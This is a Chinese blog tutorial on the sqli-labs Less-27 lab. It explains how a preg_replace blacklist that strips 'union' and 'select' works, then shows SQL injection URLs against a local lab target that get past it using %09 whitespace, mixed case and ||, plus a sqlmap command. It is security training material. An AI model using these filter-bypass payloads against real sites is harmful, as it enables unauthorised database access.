【安全】P 2-18 绕过剔除黑名单(union和select)的SQL注入

最新推荐文章于 2024-05-13 03:44:13 发布
最新推荐文章于 2024-05-13 03:44:13 发布
阅读量627 收藏
点赞数
分类专栏: 安全大师 文章标签: 网络安全 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_David_Z/article/details/113818098
版权
本文介绍了SQL注入的基础知识,包括MySQL的大小写不敏感性、编码转换以及特殊字符替换。接着详细分析了`preg_replace`函数在去除`union`的代码实现,并展示了如何通过利用%09、%0a、%0d等编码以及符号双写来绕过过滤。最后提到了sqlmap工具进行安全检测的方法,提供了一系列的payload示例。
摘要由CSDN通过智能技术生成

目录

0X01 基础知识介绍

1、Mysql中的大小写不敏感,大写与小写一样。
2、Mysql 中的十六进制与URL编码通过解码识别。
3、符号和关键字替换 and – &&、or – ||。
4、空格使用 %20表示、%0a换行 %09 tab

0X02 去除(union)的代码分析

preg_replace(mixed $pattern , mixed $replacement , mixed $subject):执行一个正则表达式的搜索和替换。
$pattern: 要搜索的模式,可以是字符串或一个字符串数组
$replacement: 用于替换的字符串或字符串数组。
$subject: 要搜索替换的目标字符串或字符串数组。
在这里插入图片描述

去除全家桶

0X03 绕过去除(union)的sql的注入

less 27 GET - Error Based- All your UNION & SELECT belong to us (过滤了union和select的)
%09表示空格、 ||表示 or 、union/select 大小写、双写绕过。
http://127.0.0.1/sqli-labs/Less-27/?id=0%27%09%09uniOn%09SelEcT%091,2,3%09||%09%271
在这里插入图片描述

http://127.0.0.1/sqli-labs/Less-27/?id=0%27%09%09uniOn%09SelEcT%091,database(),3%09||%09%271
在这里插入图片描述

同样的配方构建payload

0X04 sqlmap安全检测

sqlmap -u “URL” --dbs --batch
在这里插入图片描述
-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

骆驼实验室
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
第十八节 绕过剔除黑名单unionselect)的SQL注入-01
09-15
绕过剔除黑名单unionselect)的SQL注入SQL注入攻击的一种特殊形式,它可以绕过Web应用程序的安全检查机制,获取敏感数据或控制数据库。 基础知识介绍 在讨论绕过剔除黑名单unionselect)的SQL注入之前,...
mysql 设置的黑名单_在SQL中实现多条件任意组合黑名单的方法
weixin_29072299的博客
02-27 1226
最近的一个项目中,在对故障工单进行自动语音督办的时候,需要在某个时段对某种组合条件下的工单不督办。如在实时督办中,对所有区域告警ID为“FF--1057361341”工单,白天不督办,但夜间需督办;在受理督办中,对某个指定区域告警ID为“207-121-00-800316”的,白天督办,夜间无需督办。为了保障督办的及时性,我们采用的是任务驱动的方式。即生成任务,根据任务去判定采用什么督办模式。如下...
Doris之拦截规则 sql黑名单
qq_43688472的博客
01-27 1039
SQL黑名单 该功能仅用于限制查询语句,并且不会限制 explain 语句的执行。 支持按用户配置SQL黑名单: 通过正则匹配的方式拒绝指定SQL 通过设置partition_num, tablet_num, cardinality, 检查一个查询是否达到其中一个限制 partition_num, tablet_num, cardinality 可以一起设置,一旦一个查询达到其中一个限制,查询将会被拦截 规则 对SQL规则增删改查 创建SQL阻止规则 sql:匹配规则(基于正则匹配,特殊字符需要转译),可选
SQL注入原理及步骤以及黑名单绕过方式_java sql注入黑名单绕过
最新发布
2401_84970145的博客
05-13 1220
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
SQL-labs的第27关——unionselect被屏蔽 报错注入(Get)
qq_73393033的博客
08-04 449
注意:该关的空格、注释也被屏蔽了。
web安全SQL注入绕过技术(三)
Longwaer
02-25 3847
学习掌握SQL注入绕过技术,更好的用于日常渗透测试中使用。
sql注入漏洞
qz362228的博客
08-11 2561
sql注入漏洞原理,类型,防御方式,绕过技巧
第十六节 绕过剔除and和or的SQL注入-01
09-15
绕过剔除and和or的SQL注入 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中插入恶意SQL代码来访问或修改数据库中的敏感信息。为了防止SQL注入,开发者需要对用户输入进行严格的验证和过滤。...
第十七节 绕过剔除空格的SQL注入-01
09-15
在本节课程中,我们将介绍绕过剔除空格的SQL注入的基础知识、去除空格的代码分析、绕过去除空格的SQL注入策略、Sqlmap安全检测等内容。 基础知识介绍 在学习绕过剔除空格的SQL注入前,我们需要了解一些基础知识。...
行业分类-设备装置-纸张剔除处理方法和装置.zip
08-30
"纸张剔除处理方法和装置"这一主题,主要涉及自动化生产线中的质量控制环节,尤其是印刷、包装或造纸等行业。这种技术旨在确保产品的质量和一致性,减少浪费,并提高生产效率。 在"纸张剔除处理方法"中,我们可以...
sql注入过滤字典.txt
10-15
通过以上介绍,我们可以了解到SQL注入过滤字典中包含了各种特殊字符和关键词,这些元素在实际应用中可能会导致安全问题。因此,开发者需要了解这些知识点,并采取适当的措施来防范SQL注入攻击。
绕过去除unionselectSQL注入
qq_43776408的博客
06-14 1542
去除union代码分析 我就问你看的气不气 全过滤了 绕过去除unionSQL注入 浏览器输入id1’报错 说明存在sql注入漏洞的 猜测原语句为id=‘id’ 在输入id=1’ --+ 依然报错 输入特别大的id故意使其报错 Sqlmap安全测试 ...
sql注入常见绕过方法
ljlrookiebird的博客
09-05 4224
sql注入是web安全的常见漏洞,这里总结下常见的绕过姿势,还有其他没总结到了,小伙伴可以留言补充
渗透测试-SQL注入手法与绕过手段
Sgirll的博客
06-17 906
union select 1,group_concat(table_name),3:使用 UNION 操作符,这部分查询语句返回一个包含三列数据的结果集:第一列是数字 1,第二列是目标数据库中所有数据表的名称列表,这里使用了 GROUP_CONCAT 函数进行聚合拼接,第三列是数字 3。该攻击利用了 SQL 注入漏洞,通过修改原有的 SQL 语句,绕过了应用程序的输入校验机制,从而对目标数据库造成了安全风险。id=1:假定这是一个 Web 应用程序的 URL 查询字符串参数,指定了 id 参数的值为 1。
随时补充SQL注入绕过
weixin_44722125的博客
05-13 686
做CTF题的时候才发现自己会的注入姿势太少了 专开一篇随时补充sql注入 1.绕过空格(注释符/* /,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /!/ 最基本的绕过方法,用注释替换空格: / 注释 */ 使用浮点数: select * from users where id=8E0unio...
23-5 绕过去除 unionselectSQL 注入
weixin_43263566的博客
02-07 851
在MySQL中,默认情况下,数据库名、表名在Unix、Linux系统上是区分大小写的,而在Windows系统上则不区分大小写。但是,SQL语句中的关键字(如SELECT、INSERT)、函数名(如MAX()、COUNT())以及列名和别名通常是不区分大小写的。但是,对于字符串值的比较,默认是区分大小写的。下面,我将简要介绍一些MySQL的基础知识,以及您提到的一些特殊编码和替换技巧。在某些安全性较低的应用场景中,攻击者可能会尝试通过改变查询语句的格式来绕过安全过滤器,执行SQL注入等恶意操作。
SQL注入绕过关键词过滤的小技巧及原理(union select为例)
热门推荐
weixin_54848371的博客
09-22 1万+
本文以联合查询关键字union select为例讲解绕过关键词过滤的一些方法。之所以了解绕过,关键是发现sqlmap有时候真的是不靠谱,只能指定命令跑。有一些简单过滤很容易绕过却不能检测。虽然麻烦点,手工yyds~~。 1、大小写变种 UNION SELECT=>uNIon SElecT 选择几个字母变换大小写,可以绕过部分不太聪明的过滤器。在sql查询中是不区分大小写的所以查询语句正常执行 2、使用SQL注释 union select=>/**/UNION/**/...
变态方法突破过滤UNION+SELECT继续注入
ncafei的博客
11-27 1万+
http://www.jb51.net/article/48933.htm   前几今天遇到一个bt 的老外注射点:     //*ps 此点目前流行的注射工具射不 *//     http:// /index.php?content=more_product&id=17     http:// /index.php?content=more_product&i
绕过UNION&SELECT过滤
ChuMeng1999的博客
10-30 490
打开桌面上的火狐浏览器,选择『绕过UNION&SELECT过滤』下面的『GET-基于错误-过滤UNION&SELECT-字符型-单引号和圆括号』。打开桌面上的火狐浏览器,选择『绕过UNION&SELECT过滤』下面的『GET-基于错误-过滤UNION&SELECT-字符型-单引号』。打开桌面上的火狐浏览器,选择『绕过UNION&SELECT过滤』下面的『GET-基于错误-过滤UNION&SELECT-双引号』。很多不可见的空白字符都可以用哦,你可以试试。针对于过滤,我们要善用编码,来绕过关键字过滤。
绕过黑名单SQL注入技巧:从基础知识到Sqlmap实践
"这篇教程主要介绍了如何绕过剔除黑名单,特别是针对`union`和`select`关键词的SQL注入攻击,适用于对Web安全感兴趣的IT学习者。内容包括MySQL的基础知识、去除`union`的代码分析、绕过策略以及使用Sqlmap进行安全...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值